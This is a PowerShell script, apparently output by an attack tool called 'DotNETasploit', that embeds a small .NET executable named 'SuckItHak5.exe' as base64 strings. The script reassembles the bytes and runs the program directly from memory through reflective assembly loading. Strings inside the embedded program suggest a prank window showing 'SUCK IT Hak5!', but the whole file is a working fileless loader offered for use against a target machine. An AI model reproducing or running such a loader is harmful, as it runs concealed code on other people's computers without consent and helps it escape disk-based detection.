#################################################################################################### ########THIS IS GOING TO HACK YOU################################################################### #Payload: C:\Users\Glithn\Desktop\Programming\program writeup\DotNETasploit\DotNetasploit v2.5.5.4\FakeKeyboard\Output\SuckItHak5.exe #Size: 5120 $byteArrayType = [Type] [String] $base = [System.Collections.Generic.List``1] $genericListType = $base.MakeGenericType(@($byteArrayType)) $ByteList = [Activator]::CreateInstance($genericListType) $payloads = @() $payloads += 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFiOzEwAAAAAAAAAAOAAAgELAQgAAAoAAAAIAAAAAAAAvikAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGwpAABPAAAAAEAAAOgEAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADQKAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAxAkAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOgEAAAAQAAAAAYAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACgKQAAAAAAAEgAAAACAAUANCIAAJwGAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAQAAAoqAzAFAMEAAAAAAAAAAnsBAAAEAnsDAAAEIPAAAABvBQAACgJ7AwAABCDwAAAAbwUAAAoCewMAAAQg8AAAAG8FAAAKKAYAAApvBwAACgJ7AgAABAJ7AwAABCDwAAAAbwUAAAoCewMAAAQg8AAAAG8FAAAKAnsDAAAEIPAAAABvBQAACigGAAAKbwcAAAoCewIAAAQCewMAAAQg8AAAAG8FAAAKAnsDAAAEIPAAAABvBQAACgJ7AwAABCDwAAAAbwUAAAooBgAACm8IAAAKKgAAABMwBAD4AAAAAQAAEXMDAAAGCwdzCQAACn0BAAAEB3sBAAAEKAoAAApvBwAACgdzCwAACn0CAAAEB3sBAAAEbwwAAAoHewIAAARvDQAACgd7AQAABHIBAABwbw4AAAoHewEAAAQghAMAACCQAQAAcw8AAApvEAAACgd7AgAABBtvEQAACgd7AgAABCgSAAAKIgAAqkJzEwAACm8UAAAKB3sCAAAEKBUAAApvCAAACgd7AgAABHIdAABwbw4AAAojAAAAAABAf0BzFgAACgoGF28XAAAKB3MYAA==' $payloads += 'AAp9AwAABAYH/gYEAAAGcxkAAApvGgAACgZvGwAACgd7AQAABG8cAAAKJioeAigEAAAKKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAHACAAAjfgAA3AIAAJQCAAAjU3RyaW5ncwAAAABwBQAAPAAAACNVUwCsBQAAEAAAACNHVUlEAAAAvAUAAOAAAAAjQmxvYgAAAAAAAAACAAABVxQCAAkCAAAA+gEzABYAAAEAAAAUAAAAAwAAAAMAAAAEAAAAHQAAAAQAAAABAAAAAQAAAAQAAAABAAAAAAAKAAEAAAAAAAYAPAA1AAYAYQBOAAsAdQAAAAYApACEAAYAxACEAAoACgH1AAoAEQH1AAYAGgE1AA4AMwElARIAYwFUAQoAcgH1AC8AoAEAABIAzAFUAQoA2gH1ABIA7QFUARIADQJUAQ4AJwIlAQ4AOwIlAQoAYQL1AAYAeQKEAAAAAAABAAAAAAABAAEAAAAQABkAIQAFAAEAAQADARAA4gAAAAUAAQADAAYADwEdAAYAFwEhAAYAIQElACghAAAAAJEAQwAKAAEALCIAAAAAhhhIAA4AAQBQIAAAAACGGEgADgABAFggAAAAAIYARAEpAAEAEQBIABIAIQBIABgAKQBIAA4ACQBIAA4AQQBPATAAUQBpAT4AWQB6AUYAWQCIAUYAMQBIAA4AUQCWAUwAOQBIAA4AWQCyAVEAYQC/AVYAWQDDAVwAaQBIAGEAMQDRAWcAWQDkAW0AeQD4AXMAgQBIAHgAWQASAn8AUQAbAkwAiQBIAIUAiQAtAooAQQBIAA4AkQBIAI8AiQBPApUAiQBbAg4AMQBuApsAoQBIAA4ALgALAKwALgATALUALgAbAL4AYwDrAKcAoAAEgAAAAAAAAAAAAAAAAAAAAAAhAAAAAgAAAAAAAAAAAAAAAQAsAAAAAAACAAAAAAAAAAAAAAABAPUAAAAAAAIAAAAAAAAAAAAAAAEANQAAAAAAAgAAAAAAAAAAAAAANQBUAQAAAAADAAIAAAAAAAA8TW9kdWxlPgBTdWNrSXRIYWs1LmV4ZQBQcm9ncmFtAFN1Y2tJdEhhazUAbXNjb3JsaWIAU3lzdGVtAE9iamVjdABNYWluAC5jdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dhYmxlQXR0cmlidXRlAERlYnVnZ2luZ01vZGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQA8PmNfX0Rpc3BsYXlDbA==' $payloads += 'YXNzMQBTeXN0ZW0uV2luZG93cy5Gb3JtcwBGb3JtAGYATGFiZWwAbGIAUmFuZG9tAHJhbgBTeXN0ZW0uVGltZXJzAEVsYXBzZWRFdmVudEFyZ3MAPE1haW4+Yl9fMABOZXh0AFN5c3RlbS5EcmF3aW5nAENvbG9yAEZyb21BcmdiAENvbnRyb2wAc2V0X0JhY2tDb2xvcgBzZXRfRm9yZUNvbG9yAGdldF9CbGFjawBDb250cm9sQ29sbGVjdGlvbgBnZXRfQ29udHJvbHMAQWRkAHNldF9UZXh0AFNpemUAc2V0X1NpemUARG9ja1N0eWxlAHNldF9Eb2NrAEZvbnRGYW1pbHkAZ2V0X0dlbmVyaWNTYW5zU2VyaWYARm9udABzZXRfRm9udABnZXRfSG90UGluawBUaW1lcgBzZXRfQXV0b1Jlc2V0AEVsYXBzZWRFdmVudEhhbmRsZXIAYWRkX0VsYXBzZWQAU3RhcnQARGlhbG9nUmVzdWx0AFNob3dEaWFsb2cAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAABtTAFUAQwBLACAASQBUACAASABhAGsANQAhAAAdCgBTAFUAQwBLACAASQBUACAASABhAGsANQAhAAAAebqAhVyaSEWd5GRtq2T3TgAIt3pcVhk04IkDAAABAyAAAQUgAQERDQQgAQEIAwYSGQMGEh0DBhIhBiACARwSJQQgAQgICLA/X38R1Qo6BwADESkICAgFIAEBESkEAAARKQQgABIxBSABARItBCABAQ4FIAIBCAgFIAEBETUFIAEBETkEAAASPQYgAgESPQwFIAEBEkEEIAEBDQQgAQECBSACARwYBSABARJJBCAAEU0GBwISRRIMBAEAAAAIAQACAAAAAAAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAAAAAAFiOzEwAAAAAAgAAAH8AAADsKAAA7AoAAFJTRFOKVWTHWx0cSoZcEThXkJW+BwAAAEM6XFVzZXJzXEdsaXRoblxEb2N1bWVudHNcVmlzdWFsIFN0dWRpbyAyMDA4XFByb2plY3RzXFN1Y2tJdEhhazVcU3Vja0l0SGFrNVxvYmpcUmVsZWFzZVxTdWNrSXRIYWs1LnBkYgAAlCkAAAAAAAAAAAAArikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKApAAAAAAAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==' $payloads += 'AAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACgQAAAVAIAAAAAAAAAAAAA+EIAAOoBAAAAAAAAAAAAAFQCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAS0AQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACQAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAAEAADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUwB1AGMAawBJAHQASABhAGsANQAuAGUAeABlAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAASAAPAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAdQBjAGsASQB0AEgAYQBrADUALgBlAHgAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJ5ZXMiPz4NCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZQ==' $payloads += 'Y3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXMgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIvPg0KICAgICAgPC9yZXF1ZXN0ZWRQcml2aWxlZ2VzPg0KICAgIDwvc2VjdXJpdHk+DQogIDwvdHJ1c3RJbmZvPg0KPC9hc3NlbWJseT4NCgyte[]]$ByteArray = New-Object byte[] 5120 [Byte[]]$TempByteArray [int] $i=0 foreach($tempString in $Payloads) { $TempByteArray = [System.Convert]::FromBase64String($tempString) foreach($byteTemp in $TempByteArray) { $ByteArray[$i] = $byteTemp $i+=1 } } [System.Reflection.Assembly] $assemblyLoaded = [System.Reflection.Assembly]::Load($ByteArray); $assemblyLoaded.EntryPoint.Invoke($null,$null)